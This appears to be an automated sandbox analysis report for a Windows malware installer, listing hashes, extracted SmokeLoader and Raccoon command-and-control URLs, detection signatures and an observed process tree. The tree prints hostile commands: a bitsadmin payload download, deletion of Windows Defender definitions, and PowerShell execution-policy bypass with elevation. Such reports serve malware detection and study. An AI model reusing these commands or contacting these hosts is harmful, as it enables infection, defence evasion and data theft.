Resubmissions
24-04-2021 06:39
210424-lmjja25q22 1023-04-2021 19:10
210423-f6mvfx4yyx 1023-04-2021 19:10
210423-3qnl3etjca 1023-04-2021 18:20
210423-4keqsccdba 1023-04-2021 13:38
210423-1f2d5v8a2s 1023-04-2021 04:53
210423-eenyvz5kqj 1023-04-2021 04:53
210423-svr8rrwggs 1023-04-2021 04:53
210423-95h13plc2x 1022-04-2021 19:11
210422-6s1zd291s6 1022-04-2021 19:05
210422-dsvj9bzkvn 10Analysis
-
max time kernel
196s -
max time network
204s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
23-04-2021 13:38
Errors
Reason
Machine shutdown
General
-
Target
Install.exe
-
Size
497KB
-
MD5
41a5f4fd1ea7cac4aa94a87aebccfef0
-
SHA1
0d0abf079413a4c773754bf4fda338dc5b9a8ddc
-
SHA256
97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9
-
SHA512
5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
raccoon
Botnet
16992cd33145ccbb6feeacb4e84400a56448fa14
Attributes
-
url4cnc
https://telete.in/baudemars
rc4.plain
rc4.plain
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 8 IoCs
-
Loads dropped DLL 12 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in Program Files directory 9 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
NSIS installer 2 IoCs
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 25 IoCs
-
Modifies system certificate store 2 TTPs 3 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 55 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-D8RK2.tmp\Install.tmp"C:\Users\Admin\AppData\Local\Temp\is-D8RK2.tmp\Install.tmp" /SL5="$3011A,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-QP9FG.tmp\Ultra.exe"C:\Users\Admin\AppData\Local\Temp\is-QP9FG.tmp\Ultra.exe" /S /UID=burnerch13⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Program Files\DVD Maker\CHNQUSNMYU\ultramediaburner.exe"C:\Program Files\DVD Maker\CHNQUSNMYU\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-AM5T3.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-AM5T3.tmp\ultramediaburner.tmp" /SL5="$70016,281924,62464,C:\Program Files\DVD Maker\CHNQUSNMYU\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ab-7d17c-257-352b3-bd806c99a2a17\Dofifimaefae.exe"C:\Users\Admin\AppData\Local\Temp\ab-7d17c-257-352b3-bd806c99a2a17\Dofifimaefae.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:360 CREDAT:275457 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\02-2ee1a-fca-26093-78cece45b895a\Rokaetaroke.exe"C:\Users\Admin\AppData\Local\Temp\02-2ee1a-fca-26093-78cece45b895a\Rokaetaroke.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ie1enfa.4qn\instEU.exe & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3ie1enfa.4qn\instEU.exeC:\Users\Admin\AppData\Local\Temp\3ie1enfa.4qn\instEU.exe6⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\inubn2s1.lzf\gpooe.exe & exit5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\23e2ohlm.nz1\google-game.exe & exit5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54qsjadf.srd\md1_1eaf.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\54qsjadf.srd\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\54qsjadf.srd\md1_1eaf.exe6⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cckzynyl.hpp\toolspab1.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\cckzynyl.hpp\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\cckzynyl.hpp\toolspab1.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\cckzynyl.hpp\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\cckzynyl.hpp\toolspab1.exe7⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0nzu4zbm.4d4\SunLabsPlayer.exe /S & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\0nzu4zbm.4d4\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\0nzu4zbm.4d4\SunLabsPlayer.exe /S6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsiFE00.tmp\tempfile.ps1"7⤵
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\luyvkarp.tv3\GcleanerWW.exe /mixone & exit5⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b33ojtv0.zhg\inst.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\b33ojtv0.zhg\inst.exeC:\Users\Admin\AppData\Local\Temp\b33ojtv0.zhg\inst.exe6⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5dxlmsa1.lyl\c7ae36fa.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\5dxlmsa1.lyl\c7ae36fa.exeC:\Users\Admin\AppData\Local\Temp\5dxlmsa1.lyl\c7ae36fa.exe6⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vlk1tdaa.ara\app.exe /8-2222 & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\vlk1tdaa.ara\app.exeC:\Users\Admin\AppData\Local\Temp\vlk1tdaa.ara\app.exe /8-22226⤵
-
C:\Users\Admin\AppData\Local\Temp\vlk1tdaa.ara\app.exe"C:\Users\Admin\AppData\Local\Temp\vlk1tdaa.ara\app.exe" /8-22227⤵
-
-
-
-
-
-
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\9EDE.exeC:\Users\Admin\AppData\Local\Temp\9EDE.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\A1CC.exeC:\Users\Admin\AppData\Local\Temp\A1CC.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\B59B.exeC:\Users\Admin\AppData\Local\Temp\B59B.exe1⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\0b8e790d-bf69-4473-9a1e-bbce59ce44bb" /deny *S-1-1-0:(OI)(CI)(DE,DC)2⤵
- Modifies file permissions
-
-
C:\Users\Admin\AppData\Local\Temp\B59B.exe"C:\Users\Admin\AppData\Local\Temp\B59B.exe" --Admin IsNotAutoStart IsNotTask2⤵
-
C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin1.exe"C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin1.exe"3⤵
-
C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin1.exe"C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin1.exe" --Admin4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned5⤵
-
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all5⤵
- Deletes Windows Defender Definitions
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"5⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin2.exe"C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\updatewin2.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\5.exe"C:\Users\Admin\AppData\Local\0d50caf0-38c2-4805-bbac-f4ab9fe228be\5.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\BADA.exeC:\Users\Admin\AppData\Local\Temp\BADA.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\C621.exeC:\Users\Admin\AppData\Local\Temp\C621.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\F9DE.exeC:\Users\Admin\AppData\Local\Temp\F9DE.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\FCCC.exeC:\Users\Admin\AppData\Local\Temp\FCCC.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\545.exeC:\Users\Admin\AppData\Local\Temp\545.exe1⤵
-
C:\Users\Admin\zqywgbiw.exe"C:\Users\Admin\zqywgbiw.exe" /d"C:\Users\Admin\AppData\Local\Temp\545.exe" /e55031110000000052⤵
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
88KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
92KB
-
Filesize
84KB
-
Filesize
76KB
-
Filesize
124KB
-
Filesize
16.6MB
-
Filesize
100KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
124KB
-
Filesize
16.6MB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
172KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
308KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
12.3MB
-
Filesize
4KB
-
Filesize
12.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
57.7MB
-
Filesize
1.2MB
-
Filesize
58.0MB
-
Filesize
428KB
-
Filesize
1.2MB
-
Filesize
1.1MB
-
Filesize
61.8MB
-
Filesize
9.0MB
-
Filesize
61.8MB
-
Filesize
48KB
-
Filesize
58.0MB
-
Filesize
580KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
308KB
-
Filesize
12.3MB
-
Filesize
4KB
-
Filesize
12.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
308KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
12.3MB
-
Filesize
12.3MB